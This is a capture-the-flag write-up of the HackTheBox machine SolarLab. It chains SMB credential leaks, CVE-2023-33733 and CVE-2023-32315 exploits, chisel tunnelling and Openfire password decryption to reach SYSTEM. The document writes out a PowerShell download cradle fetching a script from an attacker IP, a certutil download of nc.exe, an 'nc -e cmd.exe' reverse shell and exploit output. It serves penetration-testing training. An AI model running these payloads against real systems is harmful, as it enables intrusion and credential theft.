Back to blog
← Back to posts

HTB: SolarLab

June 9, 2024 HackTheBox Windows Medium CVE-2023-33733 CVE-2023-32315 Openfire  12 min read
SolarLab starts with SMB enumeration revealing an Excel file containing usernames and passwords. After subdomain discovery and credential spraying against ReportHub, we exploit CVE-2023-33733 (ReportLab RCE via HTML-to-PDF injection) for a foothold as blake. Lateral movement to the openfire user goes through CVE-2023-32315 (Openfire auth bypass). Root is reached by decrypting the Openfire admin password from the embedded database using a blowfish key.
SMB → xlsx creds ReportHub (BlakeB) blake (CVE-2023-33733) openfire (CVE-2023-32315) Administrator (Openfire decrypt)

Reconnaissance

Nmap

Initial scan reveals HTTP, SMB, RPC ports on a Windows host. A full port scan additionally finds port 6791 running HTTP:

Nmap initial scan results Nmap full port scan showing port 6791

Add solarlab.htb to /etc/hosts:

/etc/hosts with solarlab.htb

SMB Enumeration

Check SMB shares anonymously:

SMB share listing showing Documents share

The Documents share is accessible. It contains several interesting files:

SMB Documents share contents
smbclient — download all
SP1R4@kali)-[~/Documents/HTB/solarlab] └$ smbclient -N //solarlab.htb/Documents smb: \> mget *
Downloaded files: details-file.xlsx, old_leave_request_form.docx, etc.

details-file.xlsx

The Excel file contains usernames, passwords, security questions, and email addresses. Most useful entries:

details-file.xlsx contents with credentials
Key credentials extracted:
KAlexander / al;ksdhfewoiuh
AlexanderK / dkjafblkjadsfgl
ClaudiaS / dadsfawe9dafkn / danenacia9234n
blake.byte / ThisCanB3typedeasily1@

Web Enumeration

Port 80 serves SolarLab IM — a coming-soon countdown page with no useful content:

SolarLab IM website on port 80

Subdomain brute-force

gobuster dns
SP1R4@kali)-[~/Documents/HTB/solarlab] └$ gobuster dns -d solarlab.htb -o gobuster_dns.log -w /opt/wordlists/seclist/Discovery/DNS/subdomains-top1million-10000.txt -t 100 Found: report.solarlab.htb
Gobuster DNS finding report.solarlab.htb

Port 6791 also redirects automatically to report.solarlab.htb. Add it to /etc/hosts:

Burp showing unknown host error before adding to hosts /etc/hosts updated with report.solarlab.htb

ReportHub — Credential Attack

Port 6791 serves a Login to ReportHub page:

ReportHub login page

Testing the credentials from the xlsx — the error messages are specific. User not found vs User authentication error allows username enumeration. AlexanderK and ClaudiaS exist but passwords are wrong:

Login showing 'User not found' error Login showing 'User authentication error' — user exists

Burp Intruder — credential spray

Use Burp Intruder with a cluster bomb attack to mix and match usernames and passwords:

Burp Intruder cluster bomb setup Burp payload sets with usernames and passwords Burp intruder results — no valid combinations found

No valid credentials found in the first spray. Looking at the username pattern more carefully — AlexanderK, ClaudiaS — suggests First name + Last initial. The xlsx shows blake.byte so the username should be BlakeB:

xlsx showing blake.byte with password ThisCanB3typedeasily1@
Burp — BlakeB hit
# Request length 660 (different from others at 2419) = valid login BlakeB : ThisCanB3typedeasily1@
Burp results showing BlakeB with length 660 — valid hit
Valid credentials: BlakeB:ThisCanB3typedeasily1@

Foothold — CVE-2023-33733 (ReportLab RCE)

After logging in, ReportHub exposes four features — Leave Request, Training Request, Home Office Request, and Travel Approval. All generate PDFs:

ReportHub dashboard with four request options Leave Request form with Generate PDF button Generated PDF output from leave request Training Request form

The PDF generator uses ReportLab which is vulnerable to CVE-2023-33733 — HTML injection in the justification field leads to RCE via the PDF rendering engine:

Google search showing CVE-2023-33733 ReportLab RCE Burp request with CVE-2023-33733 payload injected into form field

Trigger a reverse shell via a PowerShell download cradle embedded in the exploit:

CVE-2023-33733 payload
# Injected into the justification field (HTML rendered by ReportLab) powershell.exe -c iex (iwr -UseBasicParsing http://10.10.14.63/Invoke-PowerShellTcpEx.ps1) SP1R4@kali)-[~] └$ sudo nc -lvnp 5555 listening on [any] 5555 ... connect to [10.10.14.63] from (UNKNOWN) [10.10.11.16] 53730 Windows PowerShell running as user blake on SOLARLAB PS C:\Users\blake\Documents\app>
Reverse shell received as blake on SOLARLAB whoami and whoami /priv showing blake's privileges ipconfig and user.txt flag
🚩 User flag captured as solarlab\blake.

Lateral Movement — blake → openfire

Credential discovery in app database

Inside C:\Users\blake\Documents\app\instance, there's a users.db SQLite file containing all application credentials:

users.db contents showing alexanderk, claudias, blakeb credentials Credential summary: blakeb, alexanderk, claudias
credentials from users.db
blakeb : ThisCanB3typedeasily1@ alexanderk : HotP!fireguard claudias : 007poiuytrewq

Openfire — port forwarding

Checking active connections and the C:\Users directory reveals an openfire user and Openfire listening on 127.0.0.1:9090:

C:\Users showing Administrator, blake, openfire, Public Netstat showing Openfire on 127.0.0.1:9090

WinPEAS confirms the credentials in utils.py and reveals nothing additional:

WinPEAS output showing hardcoded credentials in utils.py C:\Program Files showing Openfire and RUXIM directories Access denied when trying to cd into Openfire directory

The Openfire directory is inaccessible as blake — we need the openfire user first. Forward port 9090 using chisel:

chisel — port forward 9090
# Kali — start chisel server SP1R4@kali)-[~] └$ chisel server --socks5 --reverse -p 1234 # Target — connect back and tunnel port 9090 PS C:\Users\blake\Documents\app> .\chiselx86_64.exe client 10.10.14.63:1234 R:9090:127.0.0.1:9090
Chisel server running on Kali with session established Chisel client on target connecting back Openfire Administration Console login page on 127.0.0.1:9090

CVE-2023-32315 — Openfire Auth Bypass

Google search for Openfire RCE CVE-2023-32315
CVE-2023-32315 exploit
SP1R4@kali)-[~/Documents/HTB/solarlab] └$ git clone https://github.com/miko550/CVE-2023-32315.git && cd CVE-2023-32315 SP1R4@kali)-[~/Documents/HTB/solarlab/CVE-2023-32315] └$ python3 CVE-2023-32315.py -t http://127.0.0.1:9090 User added successfully: url: http://127.0.0.1:9090 username: m87vm2 password: ky4kb6
CVE-2023-32315 exploit output — new user added

Login with the newly created user, then upload the openfire-management-tool-plugin.jar plugin:

Openfire admin dashboard after successful login Plugin upload page with openfire-management-tool-plugin.jar Management tool login interface Management tool command execution — whoami showing solarlab\openfire

Execute a reverse shell via the management tool to get a proper shell as openfire:

openfire shell via management tool
# Upload nc.exe and execute via management tool certutil -urlcache -f http://10.10.14.63/nc.exe nc.exe nc.exe 10.10.14.64 4444 -e cmd.exe SP1R4@kali)-[~] └$ sudo nc -lvnp 4444 C:\Program Files\Openfire\bin> whoami solarlab\openfire
nc shell received as solarlab\openfire

Privilege Escalation — openfire → Administrator

Openfire embedded-db

As openfire, we can now access the Openfire directory. The embedded-db directory contains the database files:

C:\Program Files\Openfire\embedded-db directory listing openfire.script file showing INSERT statements

The openfire.script contains the OFUSER table with the admin's encrypted password:

INSERT INTO OFUSER showing admin encrypted password hash OFUSER table structure and data
admin encrypted password
INSERT INTO OFUSER VALUES('admin','gjMoswpK+HakPdvLIvp6eLKlYh0=','9MwNQcJ9bF4Ye... becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442','Administrator','admin@solarlab.htb',...)

Finding the blowfish key

The OFPROPERTY table in the same script contains the passwordKey used for blowfish encryption:

INSERT INTO OFPROPERTY showing passwordKey=hGXiFzsKaAeYLjn
passwordKey from OFPROPERTY
INSERT INTO OFPROPERTY VALUES('passwordKey','hGXiFzsKaAeYLjn',0,NULL)

Decrypting the admin password

Use the Java-based c0rdis/openfire_decrypt tool (the PHP version doesn't work):

decrypting the admin password
SP1R4@kali)-[~/Documents/HTB/solarlab/openfire_decrypt] └$ javac OpenFireDecryptPass.java SP1R4@kali)-[~/Documents/HTB/solarlab/openfire_decrypt] └$ java OpenFireDecryptPass becb0c67cfec...59d442 hGXiFzsKaAeYLjn ThisPasswordShouldDo!@ (hex: 005400680069...)
admin : ThisPasswordShouldDo!@

Code execution as SYSTEM

Verify the administrator credentials against SMB and execute via impacket-smbexec:

impacket-smbexec — SYSTEM
SP1R4@kali)-[~/Documents/HTB/solarlab/openfire_decrypt] └$ impacket-smbexec administrator:'ThisPasswordShouldDo!@'@solarlab.htb Impacket v0.11.0 - Copyright 2023 Fortra [!] Launching semi-interactive shell - Careful what you execute C:\Windows\system32> whoami nt authority\system
🚩 Root flag captured. Machine pwned.

Summary

StageTechniqueTool
ReconSMB anonymous read → xlsx with credssmbclient
SubdomainDNS brute-force → report.solarlab.htbgobuster
FootholdCVE-2023-33733 ReportLab HTML-to-PDF RCEBurp, nc
Lateral (openfire)CVE-2023-32315 Openfire auth bypass → mgmt plugin RCEpython3, chisel
RootBlowfish decrypt of Openfire admin password from embedded-dbjava, impacket

Key commands

quick reference
# SMB enumeration smbclient -N //solarlab.htb/Documents # Subdomain discovery gobuster dns -d solarlab.htb -w subdomains-top1million-10000.txt # Port forwarding via chisel chisel server --socks5 --reverse -p 1234 # Kali chiselx86_64.exe client <IP>:1234 R:9090:127.0.0.1:9090 # Target # Openfire auth bypass python3 CVE-2023-32315.py -t http://127.0.0.1:9090 # Openfire password decrypt javac OpenFireDecryptPass.java java OpenFireDecryptPass <enc_password> <blowfish_key> # SMBexec as Administrator impacket-smbexec administrator:'ThisPasswordShouldDo!@'@solarlab.htb